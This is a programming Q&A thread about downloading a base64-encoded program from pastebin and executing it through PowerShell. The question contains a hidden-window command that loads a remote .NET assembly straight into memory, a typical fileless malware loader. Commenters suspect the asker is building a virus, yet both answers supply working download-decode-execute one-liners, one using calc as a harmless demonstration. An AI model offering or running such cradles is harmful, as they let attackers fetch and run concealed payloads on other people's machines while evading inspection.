# how to run base64 from powershell?

Tags: vb.net, base64

I have a program written in vb.net and I converted it to base64 strings and uploaded the base64 strings to pastebin.

How I can download it and execute it from a Powershell command?

I tried this but it's not working:

```
PowerShell.exe -windowstyle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring('https://pastbin.com/raw/xxxxxxxx'))).EntryPoint.invoke($null,$null)
```

any help will be appreciated thanks in advance

Comment: Two things: 1. Converting your scripts to base64 doesn't make them secure at all! 2. Downloading scripts from pastebin and instantly running them sounds like a really bad idea...

Comment: You wrote something in vbnet, and are trying to execute it with powershell by some magic..?

Comment: @Paxz : I don't think the OP wants to make it secure. It seems more like he/she is trying to create a virus. :)

Answer (score 2, accepted):

Ok like I said in my comments:

1. Converting your scripts to base64 doesn't make them secure at all!
2. Downloading scripts from pastebin and instantly running them sounds like a really bad idea...

But for the sake of the question of "How do I Download, decode and then run a command with powershell" I might present an answer:

```
& ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Invoke-WebRequest -Uri "https://pastebin.com/raw/hunMB9wV" |  Select-Object -ExpandProperty Content))))
```

In my example I encoded `calc` to `base64` and uploaded it to pastebin.

**Explanation:**

`&` - used to run the code

`[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String()`  - decode `base64` to `UTF8`

`Invoke-WebRequest -Uri "https://pastebin.com/raw/hunMB9wV" |  Select-Object -ExpandProperty Content` - Download the raw content of the pastebin site

Comment: thanks a lot for help I know the base64 will not make my program secure but it's kind of Confusion so please don't think I'm using it for making a virus actually I got this problem https://imgur.com/eQydNtQ

Comment: @acascwsa Invoke-Webrequest was implemented in PSv3. Upgrade your Powershell.

Answer (score 0):

If You really want to do it - this code will go to pastebin , fetch something, decode it from base64, and then run in Powershell
`Invoke-Expression -Command  $([string]([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Invoke-WebRequest -Uri https://pastebin.com/raw/XXXXXXX).content))))`